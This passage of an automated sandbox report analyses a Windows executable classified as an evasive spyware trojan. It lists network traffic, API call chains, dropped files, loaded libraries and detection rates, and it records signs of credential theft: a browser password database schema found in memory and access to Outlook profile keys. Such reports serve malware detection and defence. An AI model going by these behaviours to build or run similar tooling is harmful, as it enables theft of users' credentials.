            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.5:49827 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.5:49835 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49912 version: TLS 1.2
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_6F971B5F0_2_6F971B5F
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_00404DCC3_2_00404DCC
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_00406AF23_2_00406AF2
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_001643283_2_00164328
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_001666B83_2_001666B8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_00168DA03_2_00168DA0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_001619B83_2_001619B8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_00165F903_2_00165F90
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_00162DD13_2_00162DD1
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348ACCA03_2_348ACCA0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348A7EE43_2_348A7EE4
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348A76283_2_348A7628
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AC6383_2_348AC638
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348A03C43_2_348A03C4
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348A331A3_2_348A331A
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348ACC913_2_348ACC91
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AB4EC3_2_348AB4EC
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348ABD883_2_348ABD88
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348A6E913_2_348A6E91
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348A6EA03_2_348A6EA0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348ADEE13_2_348ADEE1
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AE79F3_2_348AE79F
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348A78483_2_348A7848
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AF0423_2_348AF042
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AB07F3_2_348AB07F
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348A69CB3_2_348A69CB
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AC1F23_2_348AC1F2
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AB9443_2_348AB944
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348ADA893_2_348ADA89
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348A6A433_2_348A6A43
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AEBF73_2_348AEBF7
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_348AE3393_2_348AE339
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376386503_2_37638650
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376396C83_2_376396C8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37639D103_2_37639D10
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_3763BDF03_2_3763BDF0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_3763A3603_2_3763A360
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_3763A9B03_2_3763A9B0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376300403_2_37630040
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37633F603_2_37633F60
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37633F703_2_37633F70
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37635F013_2_37635F01
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37635F103_2_37635F10
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_3763AFE83_2_3763AFE8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_3763AFF73_2_3763AFF7
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_3763AFF83_2_3763AFF8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376367C03_2_376367C0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37630FA83_2_37630FA8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376367B03_2_376367B0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376356603_2_37635660
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376386403_2_37638640
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376356503_2_37635650
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37632E103_2_37632E10
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376336C03_2_376336C0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376336B03_2_376336B0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376396B83_2_376396B8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376325603_2_37632560
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376325503_2_37632550
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37639D003_2_37639D00
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37634DA03_2_37634DA0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37634DB03_2_37634DB0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376314003_2_37631400
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37636C093_2_37636C09
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37636C183_2_37636C18
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376374C83_2_376374C8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37631CA03_2_37631CA0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37631CB03_2_37631CB0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376374B83_2_376374B8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376363683_2_37636368
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37637B4F3_2_37637B4F
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_3763A3523_2_3763A352
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376363583_2_37636358
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37633B083_2_37633B08
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37633B183_2_37633B18
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376343C83_2_376343C8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376343B93_2_376343B9
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376332683_2_37633268
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376352073_2_37635207
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376352083_2_37635208
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37635AA83_2_37635AA8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37635AB83_2_37635AB8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_3763BA973_2_3763BA97
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_3763F1303_2_3763F130
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376321083_2_37632108
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_3763A9A03_2_3763A9A0
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376329A83_2_376329A8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376329B83_2_376329B8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376370613_2_37637061
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376370703_2_37637070
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376318583_2_37631858
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376348203_2_37634820
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_376348103_2_37634810
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37B6E7C83_2_37B6E7C8
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37B6D6083_2_37B6D608
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_37B683283_2_37B68328
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: String function: 00402C41 appears 51 times
            Source: 2CQ2zMn0hb.exe, 00000000.00000000.2039225016.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 2CQ2zMn0hb.exe
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.0000000004462000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 2CQ2zMn0hb.exe
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 2CQ2zMn0hb.exe
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306446363.00000000346E7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 2CQ2zMn0hb.exe
            Source: 2CQ2zMn0hb.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 2CQ2zMn0hb.exe
            Source: 2CQ2zMn0hb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@6/5
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeMutant created: NULL
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeFile created: C:\Users\user\AppData\Local\Temp\nsj15BD.tmpJump to behavior
            Source: 2CQ2zMn0hb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 2CQ2zMn0hb.exe, 00000003.00000002.3307726397.00000000358ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 2CQ2zMn0hb.exeReversingLabs: Detection: 60%
            Source: 2CQ2zMn0hb.exeVirustotal: Detection: 76%
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeFile read: C:\Users\user\Desktop\2CQ2zMn0hb.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\2CQ2zMn0hb.exe "C:\Users\user\Desktop\2CQ2zMn0hb.exe"
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess created: C:\Users\user\Desktop\2CQ2zMn0hb.exe "C:\Users\user\Desktop\2CQ2zMn0hb.exe"
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess created: C:\Users\user\Desktop\2CQ2zMn0hb.exe "C:\Users\user\Desktop\2CQ2zMn0hb.exe"Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: 2CQ2zMn0hb.exeStatic file information: File size 1052225 > 1048576
            Source: 2CQ2zMn0hb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2380434486.00000000032B8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeCode function: 0_2_6F971B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F971B5F
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeFile created: C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\2CQ2zMn0hb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
